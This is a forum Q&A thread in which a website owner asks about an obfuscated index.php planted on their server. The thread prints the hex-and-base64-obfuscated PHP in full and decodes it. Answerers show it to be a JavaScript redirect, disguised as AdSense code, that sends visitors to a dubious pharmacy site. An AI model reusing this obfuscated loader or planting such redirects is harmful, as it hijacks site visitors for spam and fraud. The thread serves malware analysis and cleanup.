# Found strange index.php on website

Tags: php, security, web

I found a strange and obscured file "Index.php" at my website. I don't know who placed it at my page, but I would like to understand what it does.

The file has been obscured in the first place by replacing characters with hex values.

```
<?php /* copyright */ ${"GL\x4fB\x41\x4c\x53"}["\x6bg\x6e\x72\x77i\x6e\x64\x62n"]="\x74x\x74";$egeillbp="\x6b";${"\x47\x4cO\x42\x41L\x53"}["\x63kmj\x63uie"]="\x76";foreach($_GET as${$egeillbp}=>${${"\x47L\x4fB\x41\x4cS"}["\x63k\x6d\x6acu\x69e"]}){${"\x47\x4cO\x42\x41\x4c\x53"}["d\x78\x77\x71o\x61lv\x61\x75\x65"]="\x6b";if(preg_match("!^[a-\x7a\x30-\x39]{10,\x332}\$\x21is",${${"\x47\x4cO\x42\x41LS"}["\x64\x78\x77\x71\x6f\x61\x6c\x76a\x75\x65"]})){$xfgspywrt="\x6b";$jdhbwek="\x74\x78\x74";${$jdhbwek}=base64_decode("\x50\x46\x4eD\x55klQV\x43B\x73Y\x57\x35\x6edWFnZT1q\x59\x58Z\x68\x63\x32\x4ey\x61X\x420Pg\x30\x4b\x50\x43E\x74L\x510K\x5a\x6eVuY3Rpb2\x34g\x5a\x32V0\x62W\x55o\x63\x33RyK\x510\x4b\x65yB2YX\x49g\x61WR4ID\x30\x67\x633R\x79\x4cmluZGV\x34\x542\x59\x6f\x4a\x7a\x38n\x4bT\x73\x67a\x57\x59g\x4bG\x6c\x6be\x43A9P\x53A\x74\x4dS\x6bgc\x6dV0\x64\x58\x4au\x49\x48\x4e\x30cjsgd\x6dFy\x49Gx\x6cb\x69\x419\x49\x48\x4e0ci5\x73ZW\x35\x6e\x64G\x67\x37I\x48Z\x68\x63\x69B\x75\x5aXd\x66c3R\x79I\x440g\x49\x69I7\x49HZ\x68c\x69\x42\x70ID0\x67\x4dTs\x67\x5am\x39\x79I\x43g\x72K2\x6c\x6beDs\x67\x61\x57R\x34\x49\x44w\x67\x62G\x56\x75O\x79Bp\x5a\x48g\x67\x4bz0\x67\x4dixp\x4b\x79\x73\x70D\x51\x70\x37IH\x5ahciB\x6aaC\x41\x39\x49H\x42h\x63n\x4e\x6c\x53W\x35\x30KHN0\x63i\x35\x7a\x64\x57\x4az\x64\x48\x49oa\x57\x524LC\x41\x79KS\x77\x67\x4d\x54YpOy\x42\x75ZXd\x66\x63\x33RyICs\x39IFN\x30\x63ml\x75\x5ay\x35\x6dcm\x39t\x51\x32\x68\x68c\x6b\x4evZ\x47\x55o\x4b\x47N\x6fI\x43\x73ga\x53k\x67\x4aSAyNTY\x70\x4fy\x429IA0KZ\x479jdW\x31\x6cb\x6e\x51ud3Jp\x64\x47U\x6f\x62\x6d\x56\x33\x58\x33\x4e0c\x695zdWJ\x7a\x64H\x49o\x4d\x43xu\x5a\x58\x64f\x633\x52y\x4c\x6dx\x6c\x62\x6d\x640\x61C\x30xMSk\x72\x49lx\x31MD\x41yNlx1M\x44\x412\x4e1\x781M\x44\x41\x32Rl\x781\x4dDA\x32\x51\x6c\x781\x4dD\x412Qlx1M\x44\x41\x7a\x52Fp\x61Wl\x70\x63d\x54\x41\x77M\x6a\x4ac\x64\x54A\x77\x4d0\x4acdTA\x77M0Nc\x64T\x41\x77\x4d\x6bZcd\x54AwNz\x4e\x63d\x54\x41\x77\x4ejN\x63dT\x41w\x4ez\x4acdT\x41\x77\x4ejlcd\x54A\x77\x4ez\x42\x63dTA\x77NzR\x63\x64TA\x77\x4d0\x55i\x4b\x54sNC\x6e0\x4eC\x6d\x64vb\x32\x64\x73ZV\x39\x68\x5a\x46\x39jb\x47\x6c\x6cb\x6eQg\x50\x53A\x69c\x48V\x69\x4cTE\x30M\x7a\x411\x4fDQ\x30M\x44g\x7aMTM\x34\x4e\x44\x4d\x69O\x770\x4b\x5a\x329v\x5a2xlX\x32\x46\x6bX\x33d\x70\x5aH\x52\x6f\x49D\x30g\x4e\x7aI\x34\x4f\x77\x30KZ\x32\x39vZ2\x78lX2\x46\x6b\x58\x32\x68la\x57\x64o\x64\x43A\x39IDk\x77Ow\x30KZ29vZ2\x78\x6c\x58\x32F\x6bX\x32Z\x76c\x6d\x31h\x64\x43A9\x49\x43I3\x4d\x6a\x68\x34OTBf\x59\x58\x4diOw\x30\x4b\x5a29\x76\x5a\x32\x78l\x58\x32Fk\x583\x525cGU\x67P\x53A\x69dG\x56\x34dF\x39\x70\x62\x57F\x6eZ\x53\x497\x44Q\x70\x6e\x6229\x6e\x62\x47\x56\x66Y\x57Rf\x59\x32hh\x62\x6d5l\x62C\x419\x49\x43\x49\x69O\x77\x30KZ\x32\x560\x62WUo\x49\x6d\x680\x64H\x416Ly9\x77Y\x57d\x6cYWQ\x79L\x6d\x64vb2\x64sZ\x58N\x35bmR\x70Y\x32\x460a\x579\x75L\x6d\x4e\x76\x62\x53\x39wY\x57d\x6cYWQvc\x32\x68vd1\x39\x68Z\x48\x4du\x61nM/M\x30\x493MTYwN\x6b\x55\x32\x4e\x44\x5aB\x4e\x6bQxO\x44\x59zN\x54c2M\x7a\x56CN\x6ag\x31\x4d\x7aU4\x4eT\x55\x79QzE\x77\x4e\x54c0\x52\x44YxNEI1Q\x7aR\x43\x4e\x54k\x30Rj\x551NTg\x77NTIwNT\x670O\x54\x52\x45N\x44\x49\x30QzUz\x4d\x44\x6b0\x4ejQ4M\x30Iz\x4f\x44R\x42M\x30\x55\x30\x4d\x7aQ\x78ME\x5a\x47\x4d\x7a\x4d\x34\x4eD\x4d\x30M\x6aN\x45M\x44\x5aGQ\x55\x595R\x6bV\x47N\x6bY\x34R\x6aZGN\x6bYyRjR\x47N\x6bY\x33RUVG\x4dE\x591\x52\x6a\x46F\x51\x6a\x4aE\x4d\x6b\x4e\x46Nz\x49\x34MUY\x79\x4e\x6bY\x30\x4dTUxO\x54\x454RUV\x46N0R\x47\x52\x45Z\x45\x52\x6bQyMUUxRjB\x43R\x54V\x45\x51\x55R\x42RDV\x45\x4eU\x4d1RE\x52E\x52EN\x47MTIwMTBG\x4dDUwQj\x42FR\x44c\x69\x4bT\x73\x4e\x43\x69\x38\x76L\x530+I\x44wv\x55\x30\x4eSSVB\x55\x50\x67\x3d\x3d");echo str_replace("\x5a\x5a\x5a\x5a",${$xfgspywrt},${${"GLOB\x41LS"}["\x6bgnr\x77\x69\x6e\x64\x62\x6e"]});exit;}} /* copyright */ ?>
```

I made a small tool that translated the script back to it's origination.

```
<?php /* copyright */ 

    ${"GLOBALS"}["kgnrwindbn"]="txt";
    $egeillbp="k";${"GLOBALS"}["ckmjcuie"]="v";

    foreach($_GET as${$egeillbp}=>${${"GLOBALS"}["ckmjcuie"]})
    {
        ${"GLOBALS"}["dxwqoalvaue"]="k";
        if(preg_match("!^[a-z0-9]{10,32}\$!is",${${"GLOBALS"}["dxwqoalvaue"]}))
        {
            $xfgspywrt="k";
            $jdhbwek="txt";
            ${$jdhbwek} = base64_decode("PFNDUklQVCBsYW5ndWFnZT1qYXZhc2NyaXB0Pg0KPCEtLQ0KZnVuY3Rpb24gZ2V0bWUoc3RyKQ0KeyB2YXIgaWR4ID0gc3RyLmluZGV4T2YoJz8nKTsgaWYgKGlkeCA9PSAtMSkgcmV0dXJuIHN0cjsgdmFyIGxlbiA9IHN0ci5sZW5ndGg7IHZhciBuZXdfc3RyID0gIiI7IHZhciBpID0gMTsgZm9yICgrK2lkeDsgaWR4IDwgbGVuOyBpZHggKz0gMixpKyspDQp7IHZhciBjaCA9IHBhcnNlSW50KHN0ci5zdWJzdHIoaWR4LCAyKSwgMTYpOyBuZXdfc3RyICs9IFN0cmluZy5mcm9tQ2hhckNvZGUoKGNoICsgaSkgJSAyNTYpOyB9IA0KZG9jdW1lbnQud3JpdGUobmV3X3N0ci5zdWJzdHIoMCxuZXdfc3RyLmxlbmd0aC0xMSkrIlx1MDAyNlx1MDA2N1x1MDA2Rlx1MDA2Qlx1MDA2Qlx1MDAzRFpaWlpcdTAwMjJcdTAwM0JcdTAwM0NcdTAwMkZcdTAwNzNcdTAwNjNcdTAwNzJcdTAwNjlcdTAwNzBcdTAwNzRcdTAwM0UiKTsNCn0NCmdvb2dsZV9hZF9jbGllbnQgPSAicHViLTE0MzA1ODQ0MDgzMTM4NDMiOw0KZ29vZ2xlX2FkX3dpZHRoID0gNzI4Ow0KZ29vZ2xlX2FkX2hlaWdodCA9IDkwOw0KZ29vZ2xlX2FkX2Zvcm1hdCA9ICI3Mjh4OTBfYXMiOw0KZ29vZ2xlX2FkX3R5cGUgPSAidGV4dF9pbWFnZSI7DQpnb29nbGVfYWRfY2hhbm5lbCA9ICIiOw0KZ2V0bWUoImh0dHA6Ly9wYWdlYWQyLmdvb2dsZXN5bmRpY2F0aW9uLmNvbS9wYWdlYWQvc2hvd19hZHMuanM/M0I3MTYwNkU2NDZBNkQxODYzNTc2MzVCNjg1MzU4NTUyQzEwNTc0RDYxNEI1QzRCNTk0RjU1NTgwNTIwNTg0OTRENDI0QzUzMDk0NjQ4M0IzODRBM0U0MzQxMEZGMzM4NDM0MjNEMDZGQUY5RkVGNkY4RjZGNkYyRjRGNkY3RUVGMEY1RjFFQjJEMkNFNzI4MUYyNkY0MTUxOTE4RUVFN0RGREZERkQyMUUxRjBCRTVEQURBRDVENUM1RERERENGMTIwMTBGMDUwQjBFRDciKTsNCi8vLS0+IDwvU0NSSVBUPg==");
            echo str_replace("ZZZZ",${$xfgspywrt},${${"GLOBALS"}["kgnrwindbn"]});
            exit;
        } 
    }
/* copyright */ ?>
```

But still this wasn't really helpfull, because of the base64 Decoding inside.
The Content that has been decoded looks like:

```
<SCRIPT language=javascript>
<!--
function getme(str)
{ var idx = str.indexOf('?'); if (idx == -1) return str; var len = str.length; var new_str = ""; var i = 1; for (++idx; idx < len; idx += 2,i++)
{ var ch = parseInt(str.substr(idx, 2), 16); new_str += String.fromCharCode((ch + i) % 256); } 
document.write(new_str.substr(0,new_str.length-11)+"\u0026\u0067\u006F\u006B\u006B\u003DZZZZ\u0022\u003B\u003C\u002F\u0073\u0063\u0072\u0069\u0070\u0074\u003E");
}
google_ad_client = "pub-1430584408313843";
google_ad_width = 728;
google_ad_height = 90;
google_ad_format = "728x90_as";
google_ad_type = "text_image";
google_ad_channel = "";
getme("http://pagead2.googlesyndication.com/pagead/show_ads.js?3B71606E646A6D186357635B685358552C10574D614B5C4B594F5558052058494D424C530946483B384A3E43410FF33843423D06FAF9FEF6F8F6F6F2F4F6F7EEF0F5F1EB2D2CE7281F26F4151918EEE7DFDFDFD21E1F0BE5DADAD5D5C5DDDDCF12010F050B0ED7");
//--> </SCRIPT>
```

And still the Unicode part has also been encoded. This is the result of Decoding the Unicode part.

```
&gokk=ZZZZ";</script>
```

Now I know the content, but still can't figure out what it does. (and I don't want to try a script that I don't know).

My guess is that it tries to call google adds in a loop. But would that make sense - because google will block duplicated Ip addresses.

Has anyone seen those scripts at your website too? Or do you have an idea what the script does? 
Thank you for all suggestions.

Comment: +1 for taking the time to try and understand what's going on. With all the Google stuff in there, looks like the script might be trying to inject ads into your site to earn someone else money

Comment: If you really have no idea how it got there, there must be some vulnerability. Report `pub-1430584408313843` to Google AdSense with the full explanation

Comment: Use this link: https://support.google.com/adsense/troubleshooter/1190500?hl=en

Comment: The Google stuff is a red herring - please see my answer for more detail

Answer (score 7, accepted):

After doing a bit of sleuthing, it appears that this script is trying to redirect any hits on wherever `index.php` is to a pharmaceutical site of dubious intent. All the Google stuff is a cleverly implemented way to hide a URL redirect in JavaScript.

First, replacing `document.write` with `console.log`:

```
function getme(str) {
    var idx = str.indexOf('?');
    if (idx == -1) return str;
    var len = str.length;
    var new_str = "";
    var i = 1;
    for (++idx; idx < len; idx += 2, i++) {
        var ch = parseInt(str.substr(idx, 2), 16);
        new_str += String.fromCharCode((ch + i) % 256);
    }
    console.log(new_str.substr(0, new_str.length - 11) + "\u0026\u0067\u006F\u006B\u006B\u003DZZZZ\u0022\u003B\u003C\u002F\u0073\u0063\u0072\u0069\u0070\u0074\u003E");
}

getme("http://pagead2.googlesyndication.com/pagead/show_ads.js?3B71606E646A6D186357635B685358552C10574D614B5C4B594F5558052058494D424C530946483B384A3E43410FF33843423D06FAF9FEF6F8F6F6F2F4F6F7EEF0F5F1EB2D2CE7281F26F4151918EEE7DFDFDFD21E1F0BE5DADAD5D5C5DDDDCF12010F050B0ED7");
```

We get this:

```
<script language="javascript">window.location="http://re.da.ct.ed/rr.php?aff=7012&sub=3401&gokk=ZZZZ";</script>
```

`re.da.ct.ed` being an IP address. The function `getme()` simply parses the slug appended to the Google URL (which is a red herring).

Doing a cURL request for headers on the decoded URL, we get this:

```
$ curl 'http://re.da.ct.ed/rr.php?aff=7012&sub=3401&gokk=ZZZZ' -I
HTTP/1.1 302 Found
Date: Fri, 27 Jun 2014 21:07:39 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.4-14+deb7u5
Location: https://www.sleazydrugstore.net
Vary: Accept-Encoding
Content-Type: text/html
```

Looks like it does nothing more than redirect visitors to a sleazy looking drug store, although there might be something more malicious hidden in there.

<sub>I'm not sure whether to post the real URLs and IPs here, so some guidance would be appreciated.</sub>

Comment: crazy. I already reported to Google, but that's heavy stuff. I already deleted the file from the Server, but how can I prevent that in future?

Comment: It has nothing to do with Google. As for making sure it doesn't happen again, change your passwords, restrict server access and check your permissions. In depth advice is all over the internet, so start there. I can't fit it all into a comment

Comment: The strange thing is, that the index.php file was placed in a very odd folder called "b949e". I guess it was not used directly at my page but for a redirect from a source page to pass the user to the Drugstore.